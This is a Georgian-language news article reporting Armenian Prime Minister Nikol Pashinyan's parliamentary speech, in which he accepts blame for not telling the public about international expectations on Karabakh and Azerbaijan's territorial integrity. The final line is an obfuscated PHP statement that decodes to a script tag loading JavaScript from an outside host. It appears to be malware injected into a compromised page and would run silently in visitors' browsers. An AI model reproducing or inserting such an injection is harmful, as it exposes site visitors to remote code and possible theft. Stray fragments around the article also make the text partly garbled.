celsiusi
ავერსი შნაიდერი
დამნაშავე ვარ, არ განვაცხადე, რომ ყველა აზერბაიჯანისთვის 7 რეგიონის გადაცემას ელოდა - ხალხს არ ვუთხარი, რომ საერთაშორისო საზოგადოება ერთმნიშვნელოვნად უჭერს მხარს აზერბაიჯანის ტერიტორიულ მთლიანობას, - ამის შესახებ „რადიო თავისუფლების“ სომხეთის რედაქციის ინფორმაციით, სომხეთის პრემიერ - მინისტრმა ნიკოლ ფაშინიანმა პარლამენტში გამოსვლისას განაცხადა.
 
ფაშინიანმა ხაზგასმით აღნიშნა, რომ თავიდანვე აღიარა თავისი დანაშაული და პასუხისმგებლობა როგორც ომისთვის, ისე დამარცხებისთვის, მაგრამ არ მიიღო ოპოზიციის ბრალდება მიწების ჩაბარებასა და ღალატთან დაკავშირებით.
 
„დამნაშავე ვარ, ვინაიდან, 2018-2019 წლებში არ გამოვედი საზოგადოების წინაშე და არ განვაცხადე, რომ ჩვენი ყველა ახლო და შორეული მეგობარი ელოდება ამა თუ იმ კონფიგურაციით, აზერბაიჯანისთვის 7 რეგიონის გადაცემას და ჩვენ მიერ ყარაბაღთან დაკავშირებით დაწესებული ზღვრის დაწევას არცახის სტატუსის თაობაზე. დამნაშავე ვარ, ხალხს არ ვუთხარი, რომ საერთაშორისო საზოგადოება ერთმნიშვნელოვნად მხარს უჭერს აზერბაიჯანის ტერიტორიულ მთლიანობას და ელოდება, რომ მას ჩვენც ვაღიარებთ. ასევე ელოდება, რომ აზერბაიჯანელებმა, რომლებმაც ყარაბაღი დატოვეს, სრულფასოვნად იქნებიან ჩართული მთიანი ყარაბაღის მომავლის განსაზღვრისა და მმართველობის საკითხებში. დამნაშავე ვარ, რომ მკაფიოდ და ერთმნიშვნელოვნად არ ვთქვი, რომ ჩვენთვის შემოთავაზებული ჩვენთვის მიუღებელი სცენარები მიუღებელი იყო აზერბაიჯანისთვისაც და საერთაშორისო საზოგადოების წარმომადგენელები ჩვენ - ზოგჯერ კონკრეტულად, ზოგჯერ კი დიპლომატიური გზით - გვეუბნებოდნენ, რომ სომხური მხარის მიერ ამ ყველაფრის მიღების შემთხვევაში, ასევე საჭირო იქნებოდა აზერბაიჯანის დარწმუნება, რომ მანაც მიიღოს ეს ყველაფერი. ვალდებული ვიყავი ეს ყველაფერი დეტალურად წარმომედგინა ჩვენი ხალხისთვის, ამაშიც არის ჩემი რეალური დანაშაული, რომ მიწების ჩაბარებით, ალბათ, ათასობით ადამიანს გადავარჩენდი, ხოლო ჩაუბარებლობით, ფაქტობრივად, გავხდი გადაწყვეტილების ავტორი, რომლებმაც ათასობით მსხვერპლი გამოიწვია“, - განაცხადა ფაშინიანმა.
798
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");